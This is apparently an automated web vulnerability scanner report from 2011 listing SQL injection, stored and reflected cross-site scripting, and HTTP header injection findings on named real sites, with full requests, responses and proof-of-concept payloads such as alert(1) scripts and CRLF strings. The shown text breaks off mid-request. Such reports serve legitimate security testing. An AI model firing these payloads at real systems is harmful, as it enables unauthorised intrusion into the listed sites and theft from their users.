GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM'%20and%201%3d2--%20; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB109&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=19a7e39c%2Ddcff%2D40f6%2D8f6d%2De19d0c50259d&shopper=46215917&querystring=ci%3D42031%26config%3Dssldefault&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&cookies=1&split=14; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:49:53 GMT
Content-Length: 275694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Low cost domain names, domain transfers, web hosting, email accounts, and so much more.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Pragma" content="no-cache">
<meta name="description" content="Register & transfer domains for less. Reliable hosting. Easy-to-use site builders. Affordable SSL certificates. eCommerce solutions. ICANN-accredited.">
<meta name="keywords" content="domain name, domain registration, registrar, renewal, transfer domain, cheap, inexpensive, domain, register, DNS, URL, web address, internet address, web site name, bulk domain registration, buy domain, private domain registration, bulk price, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy">
<link rel="shortcut icon" href="http://imagesak.securepaynet.net/assets/godaddy.ico">
<link rel="stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css" /><link rel="stylesheet" type="text/css" href="http://imagesak.securepaynet.net/css/20090113_1.css">

<style type="text/css">
ul.bul
...[SNIP]...

1.19. http://www.microcad.ca/cart/add/ [productid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.microcad.ca
Path:   /cart/add/

Issue detail

The productid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the productid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /cart/add/ HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Content-Length: 31
Cache-Control: max-age=0
Origin: http://www.microcad.ca
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.1.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; mf_lastpageview=1315085419325

quantity=1&productid=1011956760'

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1212
Content-Type: text/html
ACCEPT-RANGES: none

<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">

<h4>A PHP Error was encountered</h4>

<p>Severity: Notice</p>
<p>Message: Undefined index: 1011956760'</p>
<p>Filename: mo
...[SNIP]...
ctdescriptions pd2 ON (p.productid = pd2.productid AND pd2.type = '3' AND pd2.localeid = '3')
               JOIN manufacturer m ON (p.manufacturerid = m.manufacturerid)
               WHERE p.productid = '1011956760'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1011956760''' at line 7

1.20. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.microcad.ca
Path:   /products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760'?utm_source=google&utm_medium=product-search HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:28:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 226
Content-Type: text/html
ACCEPT-RANGES: none

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND an.localeid = '3' AND hn.localeid = '3' AND pa.localeid = '3'
                   ORDE' at line 7

2. Cross-site scripting (stored)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.microcad.ca
Path:   /cart

Issue detail

The value of the productid request parameter submitted to the URL /cart/add/ is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks at the URL /cart. The payload 1542d'><script>alert(1)</script>91926b477ff was submitted in the productid parameter. This input was returned unmodified in a subsequent request for the URL /cart.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

POST /cart/add/ HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Content-Length: 31
Cache-Control: max-age=0
Origin: http://www.microcad.ca
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.1.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; mf_lastpageview=1315085419325

quantity=1&productid=1542d'><script>alert(1)</script>91926b477ff

Request 2

GET /cart HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.1.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; mf_lastpageview=1315085419325

Response 2

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:35:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 18528
Content-Type: text/html
ACCEPT-RANGES: none

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Microcad.ca | Sho
...[SNIP]...
<a href='/cart/remove/1542d'><script>alert(1)</script>91926b477ff'>
...[SNIP]...

3. HTTP header injection  previous  next
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b60f6%0d%0aefd8c279903 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/b60f6%0d%0aefd8c279903/GBRCJV675BABRAPIIGSPD6?pv=76956596667.87833&cookie=&keyw=ssl+certificates HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:40:01 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/b60f6
efd8c279903
/GBRCJV675BABRAPIIGSPD6/3NUTGTWFSRFIPAWBFDEMYM.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3.2. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload efac1%0d%0a99e4b85b399 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/TL4HVZJAKBDONOOUY7KOKV/efac1%0d%0a99e4b85b399?pv=76956596667.87833&cookie=&keyw=ssl+certificates HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:40:13 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/TL4HVZJAKBDONOOUY7KOKV/efac1
99e4b85b399
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3.3. http://www.wunderground.com/dotset.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /dotset.php

Issue detail

The value of the id request parameter is copied into the Set-Cookie response header. The payload 10dc5%0d%0a0e6b87e611 was submitted in the id parameter. This caused a response containing an injected HTTP header.

Request

GET /dotset.php?id=10dc5%0d%0a0e6b87e611&t=1 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:34 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-Powered-By: PHP/4.4.0
Set-Cookie: dottag.10dc5
0e6b87e611
=1; expires=Sat, 17 Sep 2011 21:40:34 GMT; path=/; domain=.wunderground.com
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..

3.4. http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /dotset.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Set-Cookie response header. The payload 613a1%0d%0abc7451b72e2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /dotset.php?id=42/613a1%0d%0abc7451b72e2&t=1 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:34 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-Powered-By: PHP/4.4.0
Set-Cookie: dottag.42/613a1
bc7451b72e2
=1; expires=Sat, 17 Sep 2011 21:40:34 GMT; path=/; domain=.wunderground.com
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..

4. Cross-site scripting (reflected)  previous  next
There are 26 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://feeds.feedburner.com/~s/meetup [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /~s/meetup

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69d48"%3balert(1)//4b84e31d225 was submitted in the i parameter. This input was echoed as 69d48";alert(1)//4b84e31d225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fhikingtips.html69d48"%3balert(1)//4b84e31d225 HTTP/1.1
Host: feeds.feedburner.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=UTF-8
Date: Sat, 03 Sep 2011 13:12:39 GMT
Expires: Sat, 03 Sep 2011 13:12:39 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 729
Server: GSE

var fStartPost=1;if(window.feedburner_currPost!=null){window.feedburner_currPost++}else{window.feedburner_currPost=1}if(document.body.getAttribute("fStartPost")){fs=parseInt(document.body.getAttribute
...[SNIP]...
window.feedburner_startPostOverride=fStartPost}if(window.feedburner_currPost==fStartPost){feedSrc='http://feeds.feedburner.com/~s/meetup?i='+escape("http://meetupblog.meetup.com/2011/08/hikingtips.html69d48";alert(1)//4b84e31d225")+'&showad=true';document.write('<script src="'+feedSrc+'" type="text/javascript">
...[SNIP]...

4.2. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload d0310<script>alert(1)</script>a8f786e5cdf was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=4&mbox=newhome_offerd0310<script>alert(1)</script>a8f786e5cdf&mboxId=0&mboxTime=1315043069350&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 135
Date: Sat, 03 Sep 2011 14:44:41 GMT
Server: Test & Target

mboxFactories.get('default').get('newhome_offerd0310<script>alert(1)</script>a8f786e5cdf',0).setOffer(new mboxOfferDefault()).loaded();

4.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload dcde1<img%20src%3da%20onerror%3dalert(1)>f66f189a6f5 was submitted in the mbox parameter. This input was echoed as dcde1<img src=a onerror=alert(1)>f66f189a6f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=9&mbox=SiteCatalyst%3A%20eventdcde1<img%20src%3da%20onerror%3dalert(1)>f66f189a6f5&mboxId=0&mboxTime=1315043077971&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.7&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&eVar17=8%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2